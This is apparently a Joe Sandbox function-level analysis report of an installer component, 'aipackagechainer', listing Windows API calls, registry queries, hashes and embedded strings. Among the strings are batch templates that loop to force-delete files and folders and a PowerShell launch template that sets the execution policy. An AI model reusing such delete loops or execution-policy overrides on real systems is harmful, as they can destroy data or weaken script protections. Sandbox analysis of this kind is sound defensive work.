Opcode ID: 35f3698ee3165c136c667c6cfc05821f5c2b3247a4c20849b30fe3564a8b78cc
Instruction ID: d6d346129d069f501dde1d5e02dd1b4a5da2a3414e423824004d31549c5c0344
Opcode Fuzzy Hash: 35f3698ee3165c136c667c6cfc05821f5c2b3247a4c20849b30fe3564a8b78cc
Instruction Fuzzy Hash: CF62BF70900289DFEB24DF68C849BEDBBF4BF05314F148269F9199B292DB789E44CB51

Function 0008CA30 Relevance: 42.2, APIs: 4, Strings: 20, Instructions: 220
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 0008CAA0
RegQueryValueExW.KERNELBASE(00000000,ProductType,00000000,00000000,?), ref: 0008CADB
RegQueryValueExW.KERNELBASE(00000000,ProductSuite,00000000,00000000,?,?), ref: 0008CB56
RegCloseKey.KERNELBASE(00000000), ref: 0008CD2E

Strings

Embedded(Restricted), xrefs: 0008CC87
Blade, xrefs: 0008CC70
Small Business, xrefs: 0008CB90
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 0008CA96
CommunicationServer, xrefs: 0008CBDB
Security Appliance, xrefs: 0008CC9E
ProductSuite, xrefs: 0008CB4B
Small Business(Restricted), xrefs: 0008CC0D
Compute Server, xrefs: 0008CCCC
ServerNT, xrefs: 0008CB04
Terminal Server, xrefs: 0008CBF4
Personal, xrefs: 0008CC59
WinNT, xrefs: 0008CAE1
hu, xrefs: 0008CD2E
DataCenter, xrefs: 0008CC3F
Storage Server, xrefs: 0008CCB5
EmbeddedNT, xrefs: 0008CC26
ProductType, xrefs: 0008CAD0
BackOffice, xrefs: 0008CBC2
Enterprise, xrefs: 0008CBA9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: hu$BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
API String ID: 1586453840-2705685533
Opcode ID: 212eb2db36db870884ad7f1c6cf3dbdd72756fb756c1c5529655588c1d13d44a
Instruction ID: 628e5b2964f0637bc1b592db55b0d373b92b97f61ea2f3e871b07f9afa00980d
Opcode Fuzzy Hash: 212eb2db36db870884ad7f1c6cf3dbdd72756fb756c1c5529655588c1d13d44a
Instruction Fuzzy Hash: 4671F83070070486EB60AB21DD41FAA76F5FB51354F2044B5E99AEB6C2FB74CD858B61

Function 0008C6B0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 224
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0008C71E
RegQueryValueExW.KERNELBASE(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0008C765
RegQueryValueExW.KERNELBASE(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0008C784
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0008C7B3
RegQueryValueExW.KERNELBASE(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0008C828
RegQueryValueExW.KERNELBASE(00000000,ReleaseId,00000000,00000000,?,?), ref: 0008C8A1
RegQueryValueExW.KERNELBASE(00000000,CSDVersion,00000000,00000000,?,?), ref: 0008C8F2
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0008C986
GetProcAddress.KERNEL32(00000000), ref: 0008C98D
GetCurrentProcess.KERNEL32(?), ref: 0008C9C4
IsWow64Process.KERNEL32(00000000), ref: 0008C9CB
RegCloseKey.ADVAPI32(00000000), ref: 0008CA05

Strings

CurrentBuildNumber, xrefs: 0008C81D
CurrentVersion, xrefs: 0008C7A8
ReleaseId, xrefs: 0008C896
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 0008C714
hu, xrefs: 0008CA05
kernel32, xrefs: 0008C981
CurrentMajorVersionNumber, xrefs: 0008C75A
CurrentMinorVersionNumber, xrefs: 0008C779
CSDVersion, xrefs: 0008C8E7
IsWow64Process, xrefs: 0008C97C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
String ID: hu$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
API String ID: 2654979339-1772040162
Opcode ID: 345f773912129231738aad9bb8a9fc731c1817123f296788ed9d00206e2845c9
Instruction ID: 8c38c178a130c5fa7d72742c2af890a2234ffa39143e19260c7e2608bdc250dd
Opcode Fuzzy Hash: 345f773912129231738aad9bb8a9fc731c1817123f296788ed9d00206e2845c9
Instruction Fuzzy Hash: 819190B1900228EEEB60DF50CC45FEAB7F5FB44714F0042EAE549A7690EB759AA4CF50

Function 00091B40 Relevance: 30.2, APIs: 3, Strings: 14, Instructions: 426
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000A0DB0: GetSystemDefaultLangID.KERNEL32(D11C52E5,?,00000000,?,000000C9), ref: 000A0DE6

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00091CA3
GetProcAddress.KERNEL32(00000000), ref: 00091CAA
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00091CE0

Strings

Undefined, xrefs: 00091F7A
Not selected for install., xrefs: 00091F73, 00091F93, 00091F94
Wrong OS or Os language for:, xrefs: 0009200B
Search result:, xrefs: 00091F19
No acceptable version found. It is already downloaded and it will be installed., xrefs: 00091F65
No acceptable version found., xrefs: 00091F6C
No acceptable version found. Operating System not supported., xrefs: 00091F5E
No acceptable version found. It must be downloaded manually from a site., xrefs: 00091F57
An acceptable version was found., xrefs: 00091F42
No acceptable version found. It must be installed from package., xrefs: 00091F49
kernel32, xrefs: 00091C9E
Searching for:, xrefs: 00091D99
IsWow64Process2, xrefs: 00091C99
No acceptable version found. It must be downloaded., xrefs: 00091F50

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressCurrentDefaultHandleLangModuleProcProcessSystem
String ID: An acceptable version was found.$IsWow64Process2$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
API String ID: 323535258-3110232006
Opcode ID: f3854512adb1f258a86ed310dad844b327b7906430e0a45b5560748c959ad177
Instruction ID: a884877aca4c4432559197242746a7d3aad8b667c8a55cbe66ba886747ea1f30
Opcode Fuzzy Hash: f3854512adb1f258a86ed310dad844b327b7906430e0a45b5560748c959ad177
Instruction Fuzzy Hash: BDF1CF70A00605DFDF24DFA8C994BEEB7F2BF44310F144269E4269B2D2DB71A946DB41

Function 00064300 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 260
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,00000000), ref: 000643F7
GetProcAddress.KERNEL32(00000000), ref: 000643FE
GetWindowsDirectoryW.KERNEL32(?,00000104,D11C52E5,?,00000000), ref: 00064441
PathFileExistsW.KERNELBASE(?), ref: 00064469
CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,?,00000001,S-1-5-18,?,00000001), ref: 000644EC

Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881

GetTempPathW.KERNEL32(00000104,?,D11C52E5,?,00000000), ref: 0006450F

Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3

Strings

URL, xrefs: 00064300, 000646AD
S-1-5-18, xrefs: 0006448C
Kernel32.dll, xrefs: 000643F2
GetTempPath2W, xrefs: 000643ED
\SystemTemp\, xrefs: 00064447
S-1-5-32-544, xrefs: 0006449F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$DirectoryEnterLeavePath$AddressConditionCreateExistsFileHandleModuleProcTempVariableWakeWindows
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$URL$\SystemTemp\
API String ID: 573185392-3071440713
Opcode ID: 9754cace9885bfd55c7345ad1e201059021e1fbcef133733239ec7f473b11c31
Instruction ID: 2b64a2ac6dc26fdad1aa1ddc89634d00bb4843fc358d75caae1dcb1ae6230608
Opcode Fuzzy Hash: 9754cace9885bfd55c7345ad1e201059021e1fbcef133733239ec7f473b11c31
Instruction Fuzzy Hash: 7FA1B171D04218AFDB20DFA4DC89BEEB7B5FB04710F144299E509A7292EB746E84CF51

Function 00092DA0 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetShortPathNameW.KERNEL32(00095103,00000000,00000000), ref: 00092E00
GetShortPathNameW.KERNEL32(?,?,00000000), ref: 00092E6E
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00092EBE
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00092EF4

Strings

open, xrefs: 000931B0
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00093367
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00093347, 0009334F
\\?\, xrefs: 000937D5
runas, xrefs: 000931F7
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00093342
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00093360, 0009336F
p1Wu, xrefs: 0009387B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiNamePathShortWide
String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$\\?\$open$p1Wu$runas
API String ID: 3379522384-3207207415
Opcode ID: a85950702d86503253a249ce51ad253034665db92d06fca1b0da5760a8c59a30
Instruction ID: 9677270e9e8e9fb20c99201c2182aee2671974d25329278b4e5fda5f4200c718
Opcode Fuzzy Hash: a85950702d86503253a249ce51ad253034665db92d06fca1b0da5760a8c59a30
Instruction Fuzzy Hash: F5519A71600645AFEB14DF68CC49FAEF7B6EF84720F10866DF5259B291DB71A840CBA0

Function 00097540 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 352
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNELBASE(?,AI_,00000000,?,?,?,?,?,?,?,?,?,?,?,000F5F95,000000FF), ref: 0009768C
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,000F5F95,000000FF), ref: 000976C2

Strings

%s -paths %s -retry_count %d, xrefs: 0009778F
RemoteSigned, xrefs: 000977C1
.ps1, xrefs: 000976E6, 000976F8, 00097702
-NoProfile -NonInteractive -NoLogo -ExecutionPolicy %s -Command "%s", xrefs: 000977C6
AI_, xrefs: 00097684
p1Wu, xrefs: 000976C2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$DeleteNameTemp
String ID: %s -paths %s -retry_count %d$-NoProfile -NonInteractive -NoLogo -ExecutionPolicy %s -Command "%s"$.ps1$AI_$RemoteSigned$p1Wu
API String ID: 1648863064-4249908782
Opcode ID: c549d67bfe593caf027fdc55a716ef5c15c6df313f7c4a39688900654a7cac25
Instruction ID: 9cbcc573ca288a466aea23c51a12789d1c3c1398a207bbfedf76f97cecf677e7
Opcode Fuzzy Hash: c549d67bfe593caf027fdc55a716ef5c15c6df313f7c4a39688900654a7cac25
Instruction Fuzzy Hash: 47D1B431904649DFDF10DFA8CC49BEEB7B5EF45314F188298E4099B292EB749E05DBA0

Function 00097120 Relevance: 15.2, APIs: 10, Instructions: 173
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 0009715A
SetLastError.KERNEL32(0000000E), ref: 00097197
GetCurrentThreadId.KERNEL32 ref: 00097222
SetWindowTextW.USER32(?,00000000), ref: 000972A5
GetDlgItem.USER32(?,000003E9), ref: 000972AF
SetWindowTextW.USER32(00000000,?), ref: 000972BB

Part of subcall function 00098500: GetDlgItem.USER32(?,00000002), ref: 00098520
Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098536
Part of subcall function 00098500: ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
Part of subcall function 00098500: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
Part of subcall function 00098500: GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098582
Part of subcall function 00098500: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemRect$Text$ActiveCurrentErrorInvalidateLastShowThread
String ID:
API String ID: 2012338523-0
Opcode ID: e76368a95405bb757aea63e8dd7481743171b8c0445031f0d73685c806c39d0a
Instruction ID: 2bf20a7691fa8366355dd1b56078638684dec826349ad58aa03b028e7be36c9e
Opcode Fuzzy Hash: e76368a95405bb757aea63e8dd7481743171b8c0445031f0d73685c806c39d0a
Instruction Fuzzy Hash: 5E61F031904649EFEB10DF68CC48B9ABBF4FF05720F108669F51897AE1DB74A904DB91

Function 0008D3A0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?,D11C52E5,?,?,00000000,000000FF,?,00097255), ref: 0008D405
GetFileVersionInfoW.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,000000FF,?,00097255), ref: 0008D453
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,Ur,?,?,00000000,000000FF,?,00097255), ref: 0008D48D
VerQueryValueW.VERSION(?,?,00000000,000000FF,?,?,?,?,00000000,000000FF,?,00097255), ref: 0008D4EC

Strings

\VarFileInfo\Translation, xrefs: 0008D487
Ur, xrefs: 0008D47F, 0008D482
ProductName, xrefs: 0008D4B3
\StringFileInfo\%04x%04x\%s, xrefs: 0008D4BD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileInfoQueryValueVersion$Size
String ID: ProductName$Ur$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 2099394744-3639713084
Opcode ID: 1d24ce48f3cfd1cce8a4dc795a964135661cad24e93d6717478ebe0566d49e06
Instruction ID: 29d0857f392b07d64055eece046ba65c755f1aac87080556700dcadbd3bf2030
Opcode Fuzzy Hash: 1d24ce48f3cfd1cce8a4dc795a964135661cad24e93d6717478ebe0566d49e06
Instruction Fuzzy Hash: 7F61AE71901609DFDB10EFA8C849AAEB7F9FF15315F14826AE451A72D1EB34DE00CBA0

Function 000CA16C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(?,?,?,000CA4B2,0012884C,?,?,?,000A86AB,?,?,00000000,D11C52E5), ref: 000CA17E
LoadLibraryExA.KERNELBASE(atlthunk.dll,00000000,00000800,?,?,?,000CA4B2,0012884C,?,?,?,000A86AB,?,?,00000000,D11C52E5), ref: 000CA193
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,D11C52E5), ref: 000CA20F

Strings

AtlThunk_DataToCode, xrefs: 000CA1D2
AtlThunk_FreeData, xrefs: 000CA1E9
AtlThunk_InitData, xrefs: 000CA1BB
atlthunk.dll, xrefs: 000CA18E
AtlThunk_AllocateData, xrefs: 000CA1A4

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 1b25726787ab7e990b95484491c4849ce21c77b24abfbdd48293abfa3a2aefac
Instruction ID: 0e591a970d7d3df4963a1b584b557aac960081b63ad9f35492583bcbd0c6f9a8
Opcode Fuzzy Hash: 1b25726787ab7e990b95484491c4849ce21c77b24abfbdd48293abfa3a2aefac
Instruction Fuzzy Hash: 3201E1317812AC36CA516718EC02FAD3B849B13748F040068FF80BA5A3DBA68D299597

Function 00085A20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,000F250D,00000000,00000000,?), ref: 00085ABB
GetLastError.KERNEL32 ref: 00085ACC
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00085AE2
GetExitCodeProcess.KERNELBASE(?,00000000), ref: 00085AF3
FindCloseChangeNotification.KERNELBASE(?), ref: 00085AFD
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00085B18

Strings

D, xrefs: 00085A9C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ProcessWow64$ChangeCloseCodeCreateErrorExitFindLastNotificationObjectRedirectionRevertSingleWait
String ID: D
API String ID: 799163817-2746444292
Opcode ID: 827568670870385fafa5cfb79e8fd109a79a958f975036822959969f7d4e6833
Instruction ID: d04d07e3bc907720bc0fcdf499ffba5ace772de1126846b61c5fb2c612849779
Opcode Fuzzy Hash: 827568670870385fafa5cfb79e8fd109a79a958f975036822959969f7d4e6833
Instruction Fuzzy Hash: 59316D31E00789ABDB10CFA4CD44BAEBBF9FF59310F145219E410A6290DB749980CB51

Function 00098500 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000002), ref: 00098520
GetWindowRect.USER32(00000000,?), ref: 00098536
ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
GetWindowRect.USER32(00000000,?), ref: 00098582
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$Item$InvalidateShow
String ID:
API String ID: 2147159307-0
Opcode ID: 4a524f263339af8342faf25c6b6d422d8f00d6185532b5cb59e408bcbf693af3
Instruction ID: bdfa6b48385001a793a2381c4188439be6e3ff5a0a304359a54455b61b7afdb4
Opcode Fuzzy Hash: 4a524f263339af8342faf25c6b6d422d8f00d6185532b5cb59e408bcbf693af3
Instruction Fuzzy Hash: AA212871604340AFE300DF24DC49A6B7BE9EF8D710F048658F859D72A1E730D985CB56

Function 0007DAF0 Relevance: 9.1, APIs: 6, Instructions: 149COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0007DB2B
DefWindowProcW.USER32(00000000,00000000,00000000,00000000,?,?,?,?,?,000F126D,000000FF), ref: 0007DB46

Part of subcall function 0007DDA0: GetCurrentThreadId.KERNEL32 ref: 0007DDFD

Part of subcall function 0007A1F0: FindFirstFileW.KERNELBASE(?,00000000,.ini,00000004,?,?,?,00000000,00000000,?,D11C52E5), ref: 0007A321

EnterCriticalSection.KERNEL32(00129AB0,?,000F126D,000000FF), ref: 0007DB8C
DestroyWindow.USER32(00000000,?,000F126D,000000FF), ref: 0007DBAA
LeaveCriticalSection.KERNEL32(00129AB0,?,000F126D,000000FF), ref: 0007DBF3
CoUninitialize.OLE32(?,000F126D,000000FF), ref: 0007DCC1

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSectionWindow$CurrentDestroyEnterFileFindFirstInitializeLeaveProcThreadUninitialize
String ID:
API String ID: 142156328-0
Opcode ID: 509931748a8f83687ccffe1b56243c606e6162f42c6fa083aebe36dc58196ac2
Instruction ID: 49ce33798c305a006f7c6dff67dd2b7c7070d5eb31bf120d12a86a4a25f0c363
Opcode Fuzzy Hash: 509931748a8f83687ccffe1b56243c606e6162f42c6fa083aebe36dc58196ac2
